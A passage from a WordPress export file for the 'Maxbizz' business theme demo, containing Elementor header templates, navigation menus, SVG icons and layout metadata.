0.1)"}},"elements":[{"id":"026b8ab","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_mobile":40},"elements":[{"id":"447392a","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01_Black.svg","id":334},"_padding":{"unit":"px","top":"22","right":"0","bottom":"22","left":"0","isLinked":false},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"172f4fe","elType":"column","settings":{"_column_size":50,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal","_inline_size_mobile":60},"elements":[{"id":"27f500f","elType":"widget","settings":[],"elements":[],"widgetType":"icart"},{"id":"0514b95","elType":"widget","settings":{"icon_color":"#000000","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false}},"elements":[],"widgetType":"isearch"},{"id":"f14cf6b","elType":"widget","settings":{"nav_menu":"main-menu","icon_color":"#000000","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false}},"elements":[],"widgetType":"imenu_mobile"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-07-22]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:6:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:4:{s:12:"_inline_size";i:2;s:19:"_inline_size_mobile";i:2;s:5:"align";i:1;s:17:"_ot_content_align";i:1;}}}}s:5:"icart";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:0:{}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:1;s:8:"_padding";i:1;}}}}s:12:"imenu_mobile";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:1;s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:1:{s:17:"section_structure";a:1:{s:9:"structure";i:1;}}s:5:"style";a:1:{s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 2</title>
		<link>http://wpdemo.archiwp.com/maxbizz/ot_header_builders/header-2/</link>
		<pubDate>Thu, 23 Jul 2020 03:53:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=106</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="#" target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Instagram
											</a>
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 384"><path d="m343.59375 101.039062c-7.953125 3.847657-11.28125 13.417969-7.433594 21.367188 10.511719 21.714844 15.839844 45.121094 15.839844 69.59375 0 88.222656-71.777344 160-160 160s-160-71.777344-160-160 71.777344-160 160-160c36.558594 0 70.902344 11.9375 99.328125 34.519531 6.894531 5.503907 16.976563 4.351563 22.480469-2.566406 5.503906-6.914063 4.351562-16.984375-2.570313-22.480469-33.652343-26.746094-76-41.472656-119.238281-41.472656-105.863281 0-192 86.136719-192 192s86.136719 192 192 192 192-86.136719 192-192c0-29.335938-6.40625-57.449219-19.039062-83.527344-3.839844-7.96875-13.441407-11.289062-21.367188-7.433594zm0 0"></path><path d="m192 64c-8.832031 0-16 7.167969-16 16v112c0 8.832031 7.167969 16 16 16h80c8.832031 0 16-7.167969 16-16s-7.167969-16-16-16h-64v-96c0-8.832031-7.167969-16-16-16zm0 0"></path></svg>						
										Mon - Sat: 8.00 - 18.00
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>						
										411 University St, Seattle
									</li>
								<li>
					<a href="tel:+1-800-456-478-23">						
										+1-800-456-478-23
											</a>
									</li>
						</ul>
				<a href="http://wpdemo.archiwp.com/maxbizz/">
					<img src="https://maxbizz.s3.amazonaws.com/images/02_Black.svg" alt="Maxbizz">
				</a>			        
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-361"><a href="http://wpdemo.archiwp.com/maxbizz/">Home</a></li>
<li id="menu-item-363"><a href="#">Pages</a>
<ul>
	<li id="menu-item-759"><a href="http://wpdemo.archiwp.com/maxbizz/about-us/">About Us</a></li>
	<li id="menu-item-1043"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/">Our Services 1</a></li>
	<li id="menu-item-1021"><a href="http://wpdemo.archiwp.com/maxbizz/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-764"><a href="http://wpdemo.archiwp.com/maxbizz/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-765"><a href="http://wpdemo.archiwp.com/maxbizz/our-team/">Our Team</a></li>
	<li id="menu-item-766"><a href="http://wpdemo.archiwp.com/maxbizz/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-762"><a href="http://wpdemo.archiwp.com/maxbizz/elements/">Elements</a></li>
	<li id="menu-item-767"><a href="http://wpdemo.archiwp.com/maxbizz/typography/">Typography</a></li>
	<li id="menu-item-763"><a href="http://wpdemo.archiwp.com/maxbizz/faqs/">FAQs</a></li>
	<li id="menu-item-758"><a href="http://wpdemo.archiwp.com/maxbizz/404-2/">404</a></li>
	<li id="menu-item-760"><a href="http://wpdemo.archiwp.com/maxbizz/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1041"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1044"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1042"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1040"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1149"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1022"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/">Services</a>
<ul>
	<li id="menu-item-1020"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1019"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1018"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1017"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1016"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1015"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-771"><a href="http://wpdemo.archiwp.com/maxbizz/blog/">Blog</a>
<ul>
	<li id="menu-item-1045"><a href="http://wpdemo.archiwp.com/maxbizz/blog/">Blog List</a></li>
	<li id="menu-item-1068"><a href="http://wpdemo.archiwp.com/maxbizz/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-761"><a href="http://wpdemo.archiwp.com/maxbizz/contacts/">Contacts</a></li>
</ul>			</nav>
				<!-- Form Search on Header -->
						<form role="search" method="get" action="http://wpdemo.archiwp.com/maxbizz/" >
    <label>Search for:
    <input type="search" placeholder="Search&hellip;" value="" name="s" /></label>
	<button type="submit"></button>
    </form>														
			<a href="http://wpdemo.archiwp.com/maxbizz/contacts">free quote</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>106</wp:post_id>
		<wp:post_date><![CDATA[2020-07-23 03:53:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-23 03:53:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"cc784fd","elType":"section","settings":{"layout":"full_width","content_position":"middle","structure":"21","background_background":"classic","background_color":"#262832","margin":{"unit":"px","top":"","right":0,"bottom":"","left":0,"isLinked":true},"padding":{"unit":"px","top":"0","right":"40","bottom":"0","left":"40","isLinked":false}},"elements":[{"id":"1d738b2","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"32895ca","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(255, 255, 255, 0)"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)","item_icon_secondary_color":"#FFFFFF","_id":"e7140d6"}],"shape":"circle","align":"left","icon_size":{"unit":"px","size":12,"sizes":[]},"icon_padding":{"unit":"em","size":0.5,"sizes":[]},"icon_spacing":{"unit":"px","size":8,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0.3)","_padding":{"unit":"px","top":"7","right":"0","bottom":"7","left":"0","isLinked":false},"icon_color":"custom","hover_primary_color":"#18A6F0","hover_border_color":"#18A6F0","columns":"4"},"elements":[],"widgetType":"social-icons"}],"isInner":false},{"id":"78dcf95","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"c94f846","elType":"widget","settings":{"view":"inline","icon_list":[{"text":"Mon - Sat: 8.00 - 18.00","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/symbol.svg","id":356},"library":"svg"},"_id":"e6e2d89"},{"text":"411 University St, Seattle","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":1419},"library":"svg"},"_id":"6e383c8"},{"text":"+1-800-456-478-23","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"_id":"25c4675","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":45,"sizes":[]},"icon_align":"right","icon_color":"#4B83FC","text_color":"#FFFFFF","text_indent":{"unit":"px","size":7,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_line_height":{"unit":"em","size":1,"sizes":[]},"icon_size":{"unit":"px","size":15,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"8","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"}],"isInner":false}],"isInner":false},{"id":"37d086b","elType":"section","settings":{"layout":"full_width","structure":"33","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.09)"},"padding":{"unit":"px","top":"0","right":"40","bottom":"0","left":"40","isLinked":false}},"elements":[{"id":"d44a756","elType":"column","settings":{"_column_size":25,"_inline_size":18.047000000000000596855898038484156131744384765625},"elements":[{"id":"76a2789","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02_Black.svg","id":350},"_padding":{"unit":"px","top":"26","right":"0","bottom":"28","left":"0","isLinked":false},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"a71a42c","elType":"column","settings":{"_column_size":50,"_inline_size":63.90599999999999880628820392303168773651123046875,"content_position":"center","align":"center","_ot_content_align":"horizontal","margin":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true}},"elements":[{"id":"a6322eb","elType":"widget","settings":{"nav_menu":"main-menu","space_item":{"unit":"px","size":29,"sizes":[]},"text_hover_color":"#4B82FB","_margin":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true},"menu_typography_typography":"custom","menu_typography_font_size":{"unit":"px","size":14,"sizes":[]},"menu_typography_font_weight":"700","smenu_typography_typography":"custom"},"elements":[],"widgetType":"imenu"}],"isInner":false},{"id":"990f116","elType":"column","settings":{"_column_size":25,"_inline_size":18.0270000000000010231815394945442676544189453125,"align":"flex-end","_ot_content_align":"horizontal","_ot_column_min_width":{"unit":"px","size":260,"sizes":[]},"content_position":"center"},"elements":[{"id":"3ea33c9","elType":"widget","settings":{"bg_btn":"#4B83FC","_margin":{"unit":"px","top":"0","right":"40","bottom":"0","left":"20","isLinked":false}},"elements":[],"widgetType":"isearch"},{"id":"f41aa01","elType":"widget","settings":{"text":"free quote","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/contacts","is_external":"","nofollow":"","custom_attributes":""},"btn_bg":"#4A81F9"},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:4:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:7:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;}s:20:"section_social_hover";a:2:{s:19:"hover_primary_color";i:1;s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:5;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:5:{s:12:"_inline_size";i:5;s:16:"content_position";i:2;s:5:"align";i:2;s:17:"_ot_content_align";i:2;s:20:"_ot_column_min_width";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:6:"margin";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:2:{s:4:"view";i:1;s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:2:{s:13:"space_between";i:1;s:10:"icon_align";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:6:{s:10:"text_color";i:1;s:11:"text_indent";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_line_height";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:2:{s:6:"layout";i:2;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:6:"margin";i:1;s:7:"padding";i:2;}}}}s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:5:"style";a:2:{s:18:"style_menu_section";a:5:{s:10:"space_item";i:1;s:16:"text_hover_color";i:1;s:26:"menu_typography_typography";i:1;s:25:"menu_typography_font_size";i:1;s:27:"menu_typography_font_weight";i:1;}s:19:"style_smenu_section";a:1:{s:27:"smenu_typography_typography";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_form_section";a:1:{s:6:"bg_btn";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"button_section";a:2:{s:4:"text";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:1:{s:6:"btn_bg";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header Mobile - Logo Center</title>
		<link>http://wpdemo.archiwp.com/maxbizz/ot_header_builders/header-mobile-logo-center/</link>
		<pubDate>Sat, 23 May 2020 11:00:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=168</guid>
		<description></description>
		<content:encoded><![CDATA[<button></button>
						<a href="#"></a>
							<ul id="menu-main-menu"><li id="menu-item-361"><a href="http://wpdemo.archiwp.com/maxbizz/">Home</a></li>
<li id="menu-item-363"><a href="#">Pages</a>
<ul>
	<li id="menu-item-368"><a href="#">About Us</a></li>
</ul>
</li>
<li id="menu-item-364"><a href="#">Portfolio</a></li>
<li id="menu-item-365"><a href="#">Blog</a></li>
<li id="menu-item-366"><a href="#">Shop</a></li>
<li id="menu-item-367"><a href="#">Contacts</a></li>
</ul>						   	
				<a href="http://wpdemo.archiwp.com/maxbizz/">
					<img src="https://maxbizz.s3.amazonaws.com/images/01_Black.svg" alt="Maxbizz">
				</a>			        
				<!-- Form Search on Header -->
						<form role="search" method="get" action="http://wpdemo.archiwp.com/maxbizz/" >
    <label>Search for:
    <input type="search" placeholder="Search&hellip;" value="" name="s" /></label>
	<button type="submit"></button>
    </form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>168</wp:post_id>
		<wp:post_date><![CDATA[2020-05-23 11:00:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-05-23 11:00:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-mobile-logo-center]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.4]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"d17082b","elType":"section","settings":{"structure":"30","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"}},"elements":[{"id":"cd86fb1","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_mobile":30,"_ot_content_align":"horizontal"},"elements":[{"id":"82c9ed8","elType":"widget","settings":{"nav_menu":"main-menu","icon_color":"#000000","pos_menu":"on-left"},"elements":[],"widgetType":"imenu_mobile"}],"isInner":false},{"id":"331e8c4","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_mobile":40},"elements":[{"id":"9b03ba7","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01_Black.svg","id":334},"_padding":{"unit":"px","top":"22","right":"0","bottom":"22","left":"0","isLinked":false},"align":"center","logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"1f2ae1c","elType":"column","settings":{"_column_size":33,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal","_inline_size_mobile":30},"elements":[{"id":"5b15a8e","elType":"widget","settings":{"icon_color":"#000000","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false}},"elements":[],"widgetType":"isearch"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-07-23]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:12:"imenu_mobile";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}s:7:"content";a:1:{s:15:"content_section";a:1:{s:8:"pos_menu";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:4:{s:12:"_inline_size";i:3;s:19:"_inline_size_mobile";i:3;s:17:"_ot_content_align";i:2;s:5:"align";i:1;}}}}s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:10:"logo_image";i:1;s:5:"align";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:1;s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:1:{s:17:"section_structure";a:1:{s:9:"structure";i:1;}}s:5:"style";a:1:{s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 3</title>
		<link>http://wpdemo.archiwp.com/maxbizz/ot_header_builders/header-3/</link>
		<pubDate>Fri, 24 Jul 2020 03:48:42 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=182</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz/">
					<img src="https://maxbizz.s3.amazonaws.com/images/03_White.svg" alt="Maxbizz">
				</a>			        
				<a href="tel:+1-800-456-478-23">
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
